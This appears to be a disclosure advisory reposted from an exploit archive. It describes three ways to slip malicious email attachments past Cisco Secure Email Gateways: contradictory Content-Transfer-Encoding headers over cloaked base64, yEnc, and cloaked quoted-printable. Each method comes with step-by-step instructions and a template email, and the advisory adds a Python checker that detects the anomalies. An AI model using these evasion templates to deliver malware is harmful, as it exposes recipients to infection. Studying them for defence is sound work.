## https://sploitus.com/exploit?id=PACKETSTORM:169860
This report is being published within a coordinated disclosure  
procedure. The researcher has been in contact with the vendor  
but has not received a satisfactory response within the given time  
frame. As the attack complexity is low and exploits have already  
been published by a third party, there must be no further delay  
in making the threats publicly known.  
  
The researcher prefers not to take credit for their findings.  
  
  
Evading Malware Detection by Cisco Secure Email Gateways  
========================================================  
  
Cisco Secure Email Gateways (formerly known as Cisco IronPort  
Email Security Appliances) that are configured to detect  
malicious email attachments can easily be circumvented.  
A remote attacker can leverage the error tolerance and the  
differing MIME decoding capabilities of email clients, compared  
with those of the gateway, to evade detection of malicious  
payloads by the anti-virus components on the gateway.  
  
Method 1: Cloaked Base 64  
-------------------------  
  
Step-by-step instruction:  
  
1. Prepare an email with the malicious attachment with a  
commonplace email client or employing standard MIME encoding,  
using content-transfer-encoding base64.  
  
2. Insert CR+LF line breaks at random places in the base64  
encoded block so that the lines have different lengths,  
but in a way that groups of four base64 characters (encoding  
three bytes) stay together. This is intended to evade naïve  
heuristics to detect base64 even out of context, while not  
violating the MIME standard.  
  
3. Before the content-transfer-encoding header of the attachment,  
insert another contradictory header "Content-Transfer-Encoding:  
quoted-printable". This does violate the MIME standard.  
  
4. Remove any content-length headers of the message, if present.  
  
A complete email prepared in this way may look like this:  
  
----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26  
  
--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable  
  
Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: quoted-printable  
Content-Transfer-Encoding: base64  
  
UEsD  
BAoAAAAAAN2Q  
21Q8z1FoRAAAAEQAAAAJABwAZWlj  
YXIuY29tVVQJAAOh  
[... more similar lines skipped ...]  
CwAB  
BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A  
AACHAAAAAAA=  
--boundary_ef5dcd26--  
----------------------- end example -----------------------  
  
Emails prepared in this fashion will pass through affected  
gateways with a verdict of being clean from malware, even if  
the attachment is otherwise easily recognizable malware such as  
the Eicar test virus. Many popular email clients, on the other  
hand, will present the attached file and faithfully reproduce  
it upon saving.  
  
Affected Systems:  
  
This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others. Affected Email Clients were  
Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build  
16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit),  
Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others.  
  
Method 2: yEnc Encoding  
-----------------------  
  
yEncode, or yEnc for short, is an encoding typically employed by  
Usenet clients. Some email clients are capable of decoding MIME  
parts with this encoding, too. A remote attacker using this  
encoding for a malicious email attachment will evade malware  
detection by affected gateways and may still succeed in delivering  
the payload to victims if they use particular email clients.  
Other email clients will store the attachment in an undecoded  
and thus not directly harmful form.  
  
An email prepared in this way may look like this:  
  
----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26  
  
--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable  
  
Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: x-yencode  
  
=ybegin line=128 size=236 name=file.bin  
[... binary content skipped ...]  
=yend size=236  
--boundary_ef5dcd26--  
----------------------- end example -----------------------  
  
Affected Systems:  
  
This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others. An affected Email Client  
was Mozilla Thunderbird 91.11.0 (64-bit).  
  
Method 3: Cloaked Quoted-Printable  
----------------------------------  
  
This method is similar to method 1, with the roles of  
quoted-printable and base64 swapped. The payload has to be  
encoded as quoted-printable, but with every byte encoded (rather  
than only non-printable bytes) and each placed on a separate line  
terminated by a soft line break (continuation). The contradicting  
headers now come in the order base64, quoted-printable.  
  
An email prepared in this way may look like this:  
  
----------------------- begin example -----------------------  
From: Mallory <mallory@example.com>  
To: Alice <alice@example.com>  
Date: Mon, 27 Jun 2022 18:29:22 +0200  
Subject: Your present  
Mime-Version: 1.0  
Message-Id: <b31a762c.8b44.63b67b5a@example.com>  
Content-type: multipart/mixed; boundary=boundary_ef5dcd26  
  
--boundary_ef5dcd26  
Content-type: text/plain  
Content-Transfer-Encoding: quoted-printable  
  
Here is your present.  
--boundary_ef5dcd26  
Content-type: application/octet-stream  
Content-Disposition: attachment; filename="present.zip"  
Content-Transfer-Encoding: base64  
Content-Transfer-Encoding: quoted-printable  
  
=50=  
=4B=  
=03=  
=04=  
[... more similar lines skipped ...]  
=00=  
=00=  
=00=  
=00=  
--boundary_ef5dcd26--  
----------------------- end example -----------------------  
  
Affected Systems:  
  
This exploit was successfully tested with a zip file containing  
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS  
14.2.0-620, 14.0.0-698, and others. Affected Email Clients  
were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1.  
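As an added defensive example (not code from this report or from the mime-is-broken project), the following Python checker flags the MIME anomalies all three methods rely on: contradictory Content-Transfer-Encoding headers on one part, a non-standard encoding such as x-yencode, and it decodes each attachment under every declared encoding so that a scanner sees the bytes a tolerant client would produce rather than only the interpretation the gateway happens to pick. The message, the attachment content (a constructed marker string standing in for a malware signature) and the file name are constructed for the example.

```python
import base64
import binascii
import email
import quopri

# Transfer encodings a standards-conforming MIME consumer understands; anything
# else (e.g. the report's "x-yencode") is flagged as non-standard.
KNOWN_CTES = {"7bit", "8bit", "binary", "base64", "quoted-printable"}
# Constructed marker standing in for a malware signature (not the EICAR string).
MARKER = b"CONSTRUCTED-SAMPLE"

# Constructed message mirroring the report's method 1: contradictory
# Content-Transfer-Encoding headers and base64 broken into uneven lines.
SAMPLE_MSG = (
    b"From: Mallory <mallory@example.com>\r\nTo: Alice <alice@example.com>\r\n"
    b"Mime-Version: 1.0\r\n"
    b"Content-Type: multipart/mixed; boundary=boundary_ef5dcd26\r\n\r\n"
    b"--boundary_ef5dcd26\r\nContent-Type: text/plain\r\n\r\nHere is your present.\r\n"
    b"--boundary_ef5dcd26\r\nContent-Type: application/octet-stream\r\n"
    b'Content-Disposition: attachment; filename="present.zip"\r\n'
    b"Content-Transfer-Encoding: quoted-printable\r\n"
    b"Content-Transfer-Encoding: base64\r\n\r\n"
    b"Q09O\r\nU1RSVUNURUQt\r\nU0FNUExF\r\n"  # base64 of MARKER, uneven line lengths
    b"--boundary_ef5dcd26--\r\n"
)

def decode_candidates(body, ctes):
    """Decode one part's raw body under every declared encoding, the way a
    tolerant client might, so that each interpretation can be scanned."""
    out = {}
    raw = body.encode("ascii", "surrogateescape")
    for cte in dict.fromkeys(ctes):  # de-duplicate, keep header order
        if cte == "base64":
            try:  # whitespace is legal anywhere in base64 text; strip it all first
                out[cte] = base64.b64decode("".join(body.split()), validate=True)
            except (binascii.Error, ValueError):
                pass
        elif cte == "quoted-printable":  # also handles "=50=" style soft breaks
            out[cte] = quopri.decodestring(raw)
        elif cte in KNOWN_CTES:
            out[cte] = raw
    return out

def scan_message(raw_msg):
    """Return (attachment name, reason) findings for every non-multipart part."""
    findings = []
    for part in email.message_from_bytes(raw_msg).walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or part.get_content_type()
        ctes = [v.strip().lower() for v in part.get_all("Content-Transfer-Encoding", [])]
        if len(set(ctes)) > 1:
            findings.append((name, "contradictory Content-Transfer-Encoding: " + ", ".join(ctes)))
        for cte in sorted(set(ctes) - KNOWN_CTES):
            findings.append((name, f"non-standard transfer encoding {cte!r}"))
        for cte, data in decode_candidates(part.get_payload(), ctes).items():
            if MARKER in data:  # a real deployment hands each candidate to the AV engine here
                findings.append((name, f"marker found after {cte} decoding"))
    return findings
```

Running `scan_message(SAMPLE_MSG)` reports the duplicate headers and finds the marker only after base64 decoding, which is exactly the interpretation a scanner honouring the first header would never see.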
  
References  
----------  
  
Code employing the methods presented here and many similar  
techniques to manipulate MIME encoding can be found on GitHub:  
https://github.com/noxxi/mime-is-broken  
  
Cisco has published an advisory with a workaround that  
uses an undocumented feature of the gateway to block  
incorrect MIME. This mitigates many cases of the test suite  
from GitHub, but not all, and in particular not the ones  
presented in this report. URL:  
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679  
  
End of the report.